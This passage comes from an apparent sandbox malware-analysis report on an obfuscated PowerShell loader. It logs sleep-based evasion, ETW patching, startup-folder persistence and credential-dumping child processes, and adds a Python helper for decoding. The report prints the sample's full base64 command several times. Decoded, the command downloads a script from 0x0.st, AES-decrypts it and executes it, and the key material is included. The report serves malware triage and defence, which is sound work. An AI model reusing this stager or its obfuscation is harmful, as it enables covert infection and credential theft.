                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5724 | Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6956 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6080 | Thread sleep count: 3992 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1876 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876 | Thread sleep count: 4270 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108 | Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1864 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2556 | Thread sleep count: 3587 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 | Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2008 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 | Thread sleep count: 2810 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1184 | Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5272 | Thread sleep count: 2649 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2124 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5096 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5048 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3420 | Thread sleep count: 3486 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1832 | Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3316 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516 | Thread sleep count: 3318 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4252 | Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1612 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3832 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460 | Thread sleep count: 2279 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4696 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532 | Thread sleep count: 3429 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364 | Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 716 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 716 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 identical entries)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed (2 identical entries)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW | 13_2_0040AE51
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen | 15_2_00407EF8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00418981 memset,GetSystemInfo | 13_2_00418981
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (48 identical entries)
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
                Source: powershell.exe, 0000002C.00000002.2496734270.00000000076B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                Source: powershell.exe, 00000016.00000002.1818907965.0000000008089000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: yE2MbKuFC3wUqQH6uY0ox7RonhHzty9GfhuvrduCqoYsqPMy1jdyPxVU3sFI2C9SJilaKgDpW8e4mLxIFrMFHl31x2wxGcWR4u6pi5s/CrEwEEt34TYzP5+cF2Z25sZA76T06x0L0o4rhgfs2iY+UkIJRY7mBnP1il2lv8H6Aeuc8nBorKBeVXcMEZmPtHSm0F9pwPsYj9r6SCHKo+
                Source: powershell.exe, 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CrEwEEt34TYzP5+cF2Z25sZA76T06x0L0o4rhgfs2iY+UkIJRY7mBnP1il2lv8H6Aeuc8nBorKBeVXcMEZmPtHSm0F9pwPsYj9r6SCHKruBT7Ikr
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006DB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRd^a
                Source: powershell.exe, 00000031.00000002.2734302476.00000000072F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk%
                Source: powershell.exe, 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKT
                Source: powershell.exe, 0000000A.00000002.1657990410.00000000072EA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1961674745.0000000007774000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2130722447.0000000007AC5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2298217232.00000000079C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2979667593.00000000072DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3763309008.00000000077AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.4039348848.000000000705E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Note: "Hyper-V RAW" is the display name of the AF_HYPERV (hvsocket) Winsock provider that mswsock.dll registers by default on Windows 10 and later; the string sits in the Winsock catalog of any process that has loaded it, on physical hosts as well as virtual machines. On its own it is weak evidence that the sample fingerprints a hypervisor; the sleep loops and foreground-window polling above are the stronger evasion signals in this section.
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_15-34070
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
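The base64 handed to -Command in the entry above is what the "Bypasses PowerShell execution policy" and "Base64 Encoded PowerShell Command" signatures fire on, and decoding it is the first triage step. The decoded script is itself obfuscated in three ways that the command line alone does not reveal: a junk token (MICROSOFTSERVICEUPDATES) is spliced into the download line and stripped at run time with .Replace(), later statements are assembled from strings split with a second token (ABC) and fed to IEX, and a method name is stored backwards and re-reversed with [-1..-11] -join ''. The Python below is an added triage helper, not part of Joe Sandbox and not code from the sample, that peels those layers. It embeds a prefix of the blob copied from the entry above (cut on a 4-character boundary right after the AES IV assignment so that it decodes on its own) and a constructed PowerShell fragment that mirrors the later patterns; the lowercased copies of the same command line further down in this report cannot be decoded this way, because base64 is case-sensitive.

```python
"""Added triage helper, not part of Joe Sandbox or of the sample: peel the
obfuscation layers of the base64 -Command blob recorded in this report's
process-creation entries.  Standard library only; run it offline and never
execute the recovered script."""
import base64
import re

# Prefix of the blob from the "Process created" entry above, copied from the
# report and cut on a 4-character boundary right after the AES IV
# assignment so that it decodes cleanly on its own.
BLOB_PREFIX = (
    "aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJW"
    "SUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VS"
    "VklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNF"
    "UlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VV"
    "UERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVT"
    "Oi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFU"
    "RVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09G"
    "VFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50"
    "KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0"
    "eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5T"
    "ZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGlu"
    "Zz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3Owkk"
    "YWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlv"
    "TUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9"
    "W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0"
    "Q2ZMUT09Jyk7"
)

# The command line in the shape the report records it, constructed here
# around the prefix above (the report's own copies are truncated mid-blob).
SAMPLE_CMDLINE = (
    '"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile '
    '-windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString('
    "[Convert]::FromBase64String('" + BLOB_PREFIX
)

# Constructed PowerShell fragment (not copied from the report) that mirrors
# the patterns further into the decoded script: a type name split with a
# second junk token, and a method name spelled backwards and re-reversed.
CONSTRUCTED_TAIL = (
    "IEX '$worbt=New-Object System.IO.MABCemABCorABCySABCtrABCeaABCm(,$param_var);'"
    ".Replace('ABC', '');"
    "$nkikx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nsotg);"
)

CMDLINE_B64 = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)")
JUNK_TOKEN = re.compile(r"\.Replace\('([A-Za-z0-9_]+)',\s*''\)")
REVERSED_NAME = re.compile(r"'([^']+)'\[-1\.\.-(\d+)\]\s*-join\s*''")
AES_MATERIAL = re.compile(
    r"\.(Key|IV)=\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def decode_command(cmdline):
    """Pull the first FromBase64String('...') argument out of a powershell
    command line and decode it.  The report truncates long command lines, so
    a dangling partial group is dropped and missing padding is restored."""
    m = CMDLINE_B64.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String('...') argument found")
    b64 = m.group(1)
    if len(b64) % 4 == 1:  # a lone trailing character cannot encode a byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8")


def strip_junk_tokens(script):
    """Apply every .Replace('TOKEN','') the script applies to itself, longest
    token first so a short token never mangles a longer one.  The token is
    removed everywhere, string literals included, so check key lengths."""
    tokens = sorted(set(JUNK_TOKEN.findall(script)), key=len, reverse=True)
    for token in tokens:
        script = script.replace(token, "")
    return script, tokens


def resolve_reversed_names(script):
    """Rewrite 'gnirts'[-1..-n] -join '' into the literal it evaluates to:
    the last n characters of the string, read backwards."""
    def fold(m):
        s, n = m.group(1), int(m.group(2))
        return "'" + s[::-1][:n] + "'"
    return REVERSED_NAME.sub(fold, script)


def extract_aes_material(script):
    """Decode the AES Key/IV the script assigns to its Aes object, keyed by
    property name, so the stage-2 payload can be decrypted offline."""
    return {name: base64.b64decode(b64) for name, b64 in AES_MATERIAL.findall(script)}


def deobfuscate_text(script):
    script, tokens = strip_junk_tokens(script)
    script = resolve_reversed_names(script)
    return {"script": script, "tokens": tokens, "aes": extract_aes_material(script)}


def deobfuscate(cmdline):
    return deobfuscate_text(decode_command(cmdline))


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    print("junk tokens :", result["tokens"])
    for name, raw in result["aes"].items():
        print(f"AES {name:<3} : {len(raw) * 8}-bit, hex {raw.hex()}")
    print("stage 1     :", result["script"][:120])
    print("tail sample :", deobfuscate_text(CONSTRUCTED_TAIL)["script"])
```

On the embedded prefix the first layer resolves to an iwr download of a .ps1 from 0x0.st followed by an AES-256-CBC key and 16-byte IV; those values are the pivot for blocking the download host and for decrypting the stage-2 payload if it is captured. Run the helper on the uppercase command line only: the Sigma-normalised, all-lowercase copies later in this section will not decode.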
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRk